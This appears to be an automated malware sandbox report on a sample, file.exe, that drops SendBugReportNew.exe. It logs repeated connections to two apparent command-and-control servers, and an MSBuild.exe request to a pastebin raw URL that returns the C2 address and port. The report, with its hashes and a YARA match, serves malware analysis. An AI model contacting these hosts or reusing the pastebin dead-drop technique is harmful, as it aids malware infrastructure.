                                            Aug 27, 2024 18:26:19.155844927 CEST49747443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:19.155888081 CEST49747443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:19.155906916 CEST44349747154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:20.170607090 CEST49748443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:20.170665979 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:20.170734882 CEST49748443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:20.170869112 CEST49748443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:20.170877934 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:20.762188911 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:20.810549974 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:20.843197107 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:20.843275070 CEST49748443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:20.847907066 CEST49748443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:20.847925901 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:20.848227978 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:20.849422932 CEST49748443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:20.892504930 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:25.758690119 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:25.758793116 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:25.758882046 CEST49748443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:25.758971930 CEST49748443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:25.758991957 CEST44349748154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:26.060863018 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:26.067374945 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:26.161542892 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:26.168534040 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:26.176362991 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:26.248362064 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:26.253134012 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:26.348263025 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:26.349934101 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:26.354837894 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:26.764287949 CEST49749443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:26.764348030 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:26.764447927 CEST49749443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:26.764509916 CEST49749443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:26.764518023 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:27.452030897 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:27.452152014 CEST49749443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:27.456629992 CEST49749443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:27.456650972 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:27.456948042 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:27.459706068 CEST49749443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:27.504501104 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:32.355004072 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:32.355093956 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:32.355200052 CEST49749443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:32.355321884 CEST49749443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:32.355344057 CEST44349749154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:33.343422890 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:33.343476057 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:33.343584061 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:33.343806982 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:33.343821049 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:34.050540924 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:34.050626993 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:34.056303024 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:34.056313038 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:34.056557894 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:34.057638884 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:34.104501009 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:37.920358896 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:37.925789118 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:38.022006035 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:38.024230957 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:38.029241085 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:38.954061985 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:38.954154968 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:38.954382896 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:38.954540014 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:38.954565048 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:38.954595089 CEST49750443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:38.954601049 CEST44349750154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:39.951627970 CEST49751443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:39.951688051 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:39.951759100 CEST49751443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:39.951828957 CEST49751443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:39.951841116 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:40.639318943 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:40.639724970 CEST49751443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:40.706974030 CEST49751443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:40.707005024 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:40.707319021 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:40.722903013 CEST49751443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:40.768501997 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:45.542799950 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:45.542967081 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:45.543034077 CEST49751443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:45.543075085 CEST49751443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:45.543097019 CEST44349751154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:46.545542002 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:46.545613050 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:46.545686007 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:46.545819044 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:46.545836926 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:47.218585968 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:47.218674898 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:47.223086119 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:47.223098993 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:47.223346949 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:47.224147081 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:47.268500090 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:49.592731953 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:49.598288059 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:49.692892075 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:49.796936989 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:49.801866055 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:50.765418053 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:50.810817957 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:52.130117893 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:52.130204916 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:52.130259991 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:52.130371094 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:52.130400896 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:52.130434990 CEST49752443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:52.130440950 CEST44349752154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:53.129446030 CEST49753443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:53.129503965 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:53.129601955 CEST49753443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:53.131200075 CEST49753443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:53.131216049 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:53.824412107 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:53.824496984 CEST49753443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:53.831881046 CEST49753443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:53.831903934 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:53.832228899 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:53.833621025 CEST49753443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:53.876507044 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:57.436306953 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:57.441174984 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:57.483131886 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:57.487981081 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:57.536063910 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:57.543554068 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:57.548463106 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:57.626918077 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:57.630579948 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:57.635473013 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:58.732386112 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:58.732469082 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:58.732877970 CEST49753443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:58.732916117 CEST49753443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:58.732934952 CEST44349753154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:58.858067989 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:58.866318941 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:58.981889963 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:58.985322952 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:26:58.990159035 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:26:59.748631954 CEST49754443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:59.748686075 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:26:59.748785973 CEST49754443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:59.748835087 CEST49754443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:26:59.748850107 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:00.422755003 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:00.422863960 CEST49754443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:00.478399038 CEST49754443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:00.478415966 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:00.478710890 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:00.479530096 CEST49754443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:00.520507097 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:05.335004091 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:05.335170031 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:05.335241079 CEST49754443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:05.335279942 CEST49754443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:05.335300922 CEST44349754154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:06.327508926 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:06.327565908 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:06.327692032 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:06.327857018 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:06.327866077 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:07.003084898 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:07.003181934 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:07.007582903 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:07.007596970 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:07.007972956 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:07.011821032 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:07.056488991 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:10.529889107 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:10.534832001 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:10.629777908 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:10.633780003 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:10.638870955 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:11.911753893 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:11.911840916 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:11.913038015 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:11.913125992 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:11.913125992 CEST49755443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:11.913151026 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:11.913161039 CEST44349755154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:12.920851946 CEST49756443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:12.920888901 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:12.920960903 CEST49756443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:12.921062946 CEST49756443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:12.921070099 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:13.605700016 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:13.606193066 CEST49756443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:13.613279104 CEST49756443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:13.613289118 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:13.613534927 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:13.617106915 CEST49756443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:13.660512924 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:18.504672050 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:18.504774094 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:18.504839897 CEST49756443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:18.508825064 CEST49756443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:18.508860111 CEST44349756154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:19.514341116 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:19.514413118 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:19.514493942 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:19.514591932 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:19.514600992 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:20.205560923 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:20.205672026 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:20.210081100 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:20.210100889 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:20.210349083 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:20.211020947 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:20.252506971 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:20.760087013 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:20.935831070 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:22.204720974 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:22.209830046 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:22.307658911 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:22.311511993 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:22.316701889 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:25.112026930 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:25.112126112 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:25.112309933 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:25.112351894 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:25.112375975 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:25.112387896 CEST49757443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:25.112392902 CEST44349757154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:26.124125004 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:26.124187946 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:26.124257088 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:26.124311924 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:26.124317884 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:26.764350891 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:26.769265890 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:26.803425074 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:26.803603888 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:26.810956955 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:26.810972929 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:26.811187029 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:26.814961910 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:26.860505104 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:26.866895914 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:26.868691921 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:26.892616987 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:29.686402082 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:29.691493988 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:29.786128998 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:29.788300037 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:29.793209076 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:31.715590954 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:31.715684891 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:31.715820074 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:31.715909958 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:31.715939045 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:31.715955019 CEST49758443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:31.715960979 CEST44349758154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:32.724570990 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:32.724632025 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:32.724714041 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:32.724777937 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:32.724786997 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:33.404331923 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:33.404438019 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:33.412930012 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:33.412951946 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:33.413234949 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:33.414551020 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:33.456509113 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:38.315381050 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:38.315476894 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:38.315654993 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:38.320231915 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:38.320250988 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:38.320266962 CEST49759443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:38.320271969 CEST44349759154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:40.102405071 CEST49760443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:40.102446079 CEST44349760154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:40.103037119 CEST49760443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:40.103101015 CEST49760443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:40.103111029 CEST44349760154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:40.793354034 CEST44349760154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:40.793425083 CEST49760443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:40.797977924 CEST49760443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:40.797988892 CEST44349760154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:40.798242092 CEST44349760154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:40.798830032 CEST49760443192.168.2.7154.216.19.149
                                            Aug 27, 2024 18:27:40.844504118 CEST44349760154.216.19.149192.168.2.7
                                            Aug 27, 2024 18:27:41.092448950 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:41.097719908 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:41.194653988 CEST66774972685.209.133.150192.168.2.7
                                            Aug 27, 2024 18:27:41.196132898 CEST497266677192.168.2.785.209.133.150
                                            Aug 27, 2024 18:27:41.200968981 CEST66774972685.209.133.150192.168.2.7
                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 27, 2024 18:23:35.015795946 CEST6166553192.168.2.71.1.1.1
                                            Aug 27, 2024 18:24:12.659607887 CEST4960253192.168.2.71.1.1.1
                                            Aug 27, 2024 18:24:12.666712999 CEST53496021.1.1.1192.168.2.7
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Aug 27, 2024 18:23:35.015795946 CEST192.168.2.71.1.1.10x35e5Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                            Aug 27, 2024 18:24:12.659607887 CEST192.168.2.71.1.1.10xb98fStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Aug 27, 2024 18:23:35.023037910 CEST1.1.1.1192.168.2.70x35e5No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                            Aug 27, 2024 18:24:12.666712999 CEST1.1.1.1192.168.2.70xb98fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                            Aug 27, 2024 18:24:12.666712999 CEST1.1.1.1192.168.2.70xb98fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                            Aug 27, 2024 18:24:12.666712999 CEST1.1.1.1192.168.2.70xb98fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                            • pastebin.com
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.749725104.20.4.2354431196C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-27 16:24:13 UTC74OUTGET /raw/jxfGm9Pc HTTP/1.1
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-08-27 16:24:14 UTC388INHTTP/1.1 200 OK
                                            Date: Tue, 27 Aug 2024 16:24:14 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: MISS
                                            Last-Modified: Tue, 27 Aug 2024 16:24:14 GMT
                                            Server: cloudflare
                                            CF-RAY: 8b9d691eaec572a7-EWR
                                            2024-08-27 16:24:14 UTC25INData Raw: 31 33 0d 0a 38 35 2e 32 30 39 2e 31 33 33 2e 31 35 30 3a 36 36 37 37 0d 0a
                                            Data Ascii: 1385.209.133.150:6677
                                            2024-08-27 16:24:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:7
                                            Start time:12:23:31
                                            Start date:27/08/2024
                                            Path:C:\Users\user\Desktop\file.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                            Imagebase:0x400000
                                            File size:2'594'056 bytes
                                            MD5 hash:61D31FB13C1DD46FCB03CAF7F648508C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000007.00000003.1286758641.00000000026C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:9
                                            Start time:12:23:32
                                            Start date:27/08/2024
                                            Path:C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\SendBugReportNew.exe"
                                            Imagebase:0x400000
                                            File size:1'312'792 bytes
                                            MD5 hash:58717509C1521EACFCC7CDA39E6BD45C
                                            Has elevated privileges:true
